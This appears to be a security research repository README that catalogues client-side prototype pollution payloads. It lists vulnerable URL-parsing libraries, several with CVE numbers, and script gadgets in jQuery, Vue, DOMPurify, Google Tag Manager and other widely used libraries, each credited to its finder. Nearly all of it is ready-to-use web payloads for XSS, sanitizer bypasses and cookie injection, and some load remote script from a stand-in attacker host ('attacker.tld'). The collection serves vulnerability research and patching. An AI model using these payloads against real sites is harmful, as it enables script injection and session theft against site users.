If you are unfamiliar with Prototype Pollution Attack, you should read the following first:
JavaScript prototype pollution attack in NodeJS by Olivier Arteau
Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski
In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location
parsing and useful script gadgets that can be used to demonstrate the impact.
Name | Payload | Refs | Found by |
---|---|---|---|
Wistia Embedded Video (Fixed) | ?__proto__[test]=test ?__proto__.test=test |
[1] | William Bowling |
jQuery query-object plugin CVE-2021-20083 |
?__proto__[test]=test #__proto__[test]=test |
Sergey Bobrov | |
jQuery Sparkle CVE-2021-20084 |
?__proto__.test=test ?constructor.prototype.test=test |
Sergey Bobrov | |
V4Fire Core Library | ?__proto__.test=test ?__proto__[test]=test ?__proto__[test]={"json":"value"} |
Sergey Bobrov | |
backbone-query-parameters CVE-2021-20085 |
?__proto__.test=test ?constructor.prototype.test=test ?__proto__.array=1|2|3 |
[1] | Sergey Bobrov |
jQuery BBQ CVE-2021-20086 |
?__proto__[test]=test ?constructor[prototype][test]=test |
Sergey Bobrov | |
jquery-deparam CVE-2021-20087 |
?__proto__[test]=test ?constructor[prototype][test]=test |
Sergey Bobrov | |
MooTools More CVE-2021-20088 |
?__proto__[test]=test ?constructor[prototype][test]=test |
Sergey Bobrov | |
Swiftype Site Search (Fixed) | #__proto__[test]=test |
[1] | s1r1us |
CanJS deparam | ?__proto__[test]=test ?constructor[prototype][test]=test |
Rahul Maini | |
Purl (jQuery-URL-Parser) CVE-2021-20089 |
?__proto__[test]=test ?constructor[prototype][test]=test #__proto__[test]=test |
Sergey Bobrov | |
HubSpot Tracking Code (Fixed) | ?__proto__[test]=test ?constructor[prototype][test]=test #__proto__[test]=test |
Sergey Bobrov | |
YUI 3 querystring-parse | ?constructor[prototype][test]=test |
Sergey Bobrov | |
Mutiny (Fixed) | ?__proto__.test=test |
SPQR | |
jQuery parseParams | ?__proto__.test=test ?constructor.prototype.test=test |
POSIX | |
php.js parse_str | ?__proto__[test]=test ?constructor[prototype][test]=test |
POSIX | |
arg.js | ?__proto__[test]=test ?__proto__.test=test ?constructor[prototype][test]=test #__proto__[test]=test |
POSIX | |
davis.js | ?__proto__[test]=test |
POSIX | |
Component querystring | ?__proto__[NUMBER]=test ?__proto__[123]=test |
Masato Kinugawa | |
Aurelia path | ?__proto__[test]=test |
[1] | s1r1us |
analytics-utils < 1.0.3 | ?__proto__[test]=test ?constructor[prototype][test]=test |
[1] | alexdaviestray |
Name | Payload | Impact | Refs | Found by |
---|---|---|---|---|
Wistia Embedded Video | ?__proto__[innerHTML]=<img/src/onerror%3dalert(1)> |
XSS | [1] | William Bowling |
jQuery $.get | ?__proto__[context]=<img/src/onerror%3dalert(1)> &__proto__[jquery]=x |
XSS | Sergey Bobrov | |
jQuery $.get >= 3.0.0 Boolean.prototype |
?__proto__[url][]=data:,alert(1)// &__proto__[dataType]=script |
XSS | Michał Bentkowski | |
jQuery $.get >= 3.0.0 Boolean.prototype |
?__proto__[url]=data:,alert(1)// &__proto__[dataType]=script &__proto__[crossDomain]= |
XSS | Sergey Bobrov | |
jQuery $.getScript >= 3.4.0 | ?__proto__[src][]=data:,alert(1)// |
XSS | s1r1us | |
jQuery $.getScript 3.0.0 - 3.3.1 Boolean.prototype |
?__proto__[url]=data:,alert(1)// |
XSS | s1r1us | |
jQuery $(html) | ?__proto__[div][0]=1 &__proto__[div][1]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
jQuery $(x).off String.prototype |
?__proto__[preventDefault]=x &__proto__[handleObj]=x &__proto__[delegateTarget]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
Google reCAPTCHA | ?__proto__[srcdoc][]=<script>alert(1)</script> |
XSS | s1r1us | |
Twitter Universal Website Tag | ?__proto__[hif][]=javascript:alert(1) |
XSS | Sergey Bobrov | |
Tealium Universal Tag | ?__proto__[attrs][src]=1 &__proto__[src]=data:,alert(1)// |
XSS | Sergey Bobrov | |
Akamai Boomerang | ?__proto__[BOOMR]=1 &__proto__[url]=//attacker.tld/js.js |
XSS | s1r1us | |
Lodash <= 4.17.15 | ?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1) |
XSS | [1] | Alex Brasetvik |
sanitize-html | ?__proto__[*][]=onload |
Bypass | [1] | Michał Bentkowski |
sanitize-html | ?__proto__[innerText]=<script>alert(1)</script> |
Bypass | [1] | Hpdoger |
js-xss | ?__proto__[whiteList][img][0]=onerror &__proto__[whiteList][img][1]=src |
Bypass | [1] | Michał Bentkowski |
DOMPurify <= 2.0.12 | ?__proto__[ALLOWED_ATTR][0]=onerror &__proto__[ALLOWED_ATTR][1]=src |
Bypass | [1] | Michał Bentkowski |
DOMPurify <= 2.0.12 | ?__proto__[documentMode]=9 |
Bypass | [1] | Michał Bentkowski |
Google Closure | ?__proto__[*%20ONERROR]=1 &__proto__[*%20SRC]=1 |
Bypass | [1] | Michał Bentkowski |
Google Closure | ?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)// |
XSS | [1] | Michał Bentkowski |
Marionette.js / Backbone.js | ?__proto__[tagName]=img &__proto__[src][]=x: &__proto__[onerror][]=alert(1) |
XSS | Sergey Bobrov | |
Adobe Dynamic Tag Management | ?__proto__[src]=data:,alert(1)// |
XSS | Sergey Bobrov | |
Adobe Dynamic Tag Management | ?__proto__[SRC]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
Swiftype Site Search | ?__proto__[xxx]=alert(1) |
XSS | s1r1us | |
Embedly Cards | ?__proto__[onload]=alert(1) |
XSS | Guilherme Keerok | |
Segment Analytics.js | ?__proto__[script][0]=1 &__proto__[script][1]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
Knockout.js Array.prototype |
?__proto__[4]=a':1,[alert(1)]:1,'b &__proto__[5]=, |
XSS | Michał Bentkowski | |
Zepto.js | ?__proto__[onerror]=alert(1) |
XSS | [1] | lih3iu |
Zepto.js | ?__proto__[html]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
Sprint.js | ?__proto__[div][intro]=<img%20src%20onerror%3dalert(1)> |
XSS | [1] | lih3iu |
Vue.js | ?__proto__[v-if]=_c.constructor('alert(1)')() |
XSS | POSIX | |
Vue.js | ?__proto__[attrs][0][name]=src &__proto__[attrs][0][value]=xxx &__proto__[xxx]=data:,alert(1)// &__proto__[is]=script |
XSS | [1] | s1r1us |
Vue.js | ?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')() |
XSS | [1] | r00timentary |
Vue.js | ?__proto__[data]=a &__proto__[template][nodeType]=a &__proto__[template][innerHTML]=<script>alert(1)</script> |
XSS | [1] | SuperGuesser |
Vue.js | ?__proto__[props][][value]=a &__proto__[name]=":''.constructor.constructor('alert(1)')()," |
XSS | [1] | st98_ |
Vue.js | ?__proto__[template]=<script>alert(1)</script> |
XSS | [1] | huli |
Demandbase Tag | ?__proto__[Config][SiteOptimization][enabled]=1 &__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php? |
XSS | SPQR | |
@analytics/google-tag-manager | ?__proto__[customScriptSrc]=//attacker.tld/xss.js |
XSS | SPQR | |
i18next | ?__proto__[lng]=cimode &__proto__[appendNamespaceToCIMode]=x &__proto__[nsSeparator]=<img/src/onerror%3dalert(1)> |
Potential XSS | Sergey Bobrov | |
i18next < 19.8.5 | ?__proto__[lng]=a &__proto__[a]=b &__proto__[obj]=c &__proto__[k]=d &__proto__[d]=<img/src/onerror%3dalert(1)> |
Potential XSS | Sergey Bobrov | |
i18next >= 19.8.5 | ?__proto__[lng]=a &__proto__[key]=<img/src/onerror%3dalert(1)> |
Potential XSS | Sergey Bobrov | |
Google Analytics | ?__proto__[cookieName]=COOKIE%3DInjection%3B |
Cookie Injection | Sergey Bobrov | |
Popper.js | ?__proto__[arrow][style]=color:red;transition:all%201s &__proto__[arrow][ontransitionend]=alert(1) ?__proto__[reference][style]=color:red;transition:all%201s &__proto__[reference][ontransitionend]=alert(2) ?__proto__[popper][style]=color:red;transition:all%201s &__proto__[popper][ontransitionend]=alert(3) |
XSS | [1] [2] | Matheus Vrech |
Pendo Agent | ?__proto__[dataHost]=attacker.tld/js.js%23 |
XSS | Renwa | |
script.aculo.us String.constructor |
?x=x &x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
hCaptcha (Fixed) | ?__proto__[assethost]=javascript:alert(1)// |
XSS | Masato Kinugawa | |
Google Closure | ?__proto__[trustedTypes]=x &__proto__[emptyHTML]=<img/src/onerror%3dalert(1)> |
XSS | Mathias Karlsson | |
Google Tag Manager | ?__proto__[vtp_enableRecaptcha]=1 &__proto__[srcdoc]=<script>alert(1)</script> |
XSS | terjanq | |
Google Tag Manager | ?__proto__[q][0][0]=require &__proto__[q][0][1]=x &__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7 |
XSS | Sergey Bobrov / Masato Kinugawa |
|
Google Analytics | ?__proto__[q][0][0]=require &__proto__[q][0][1]=x &__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7 |
XSS | Sergey Bobrov / Masato Kinugawa |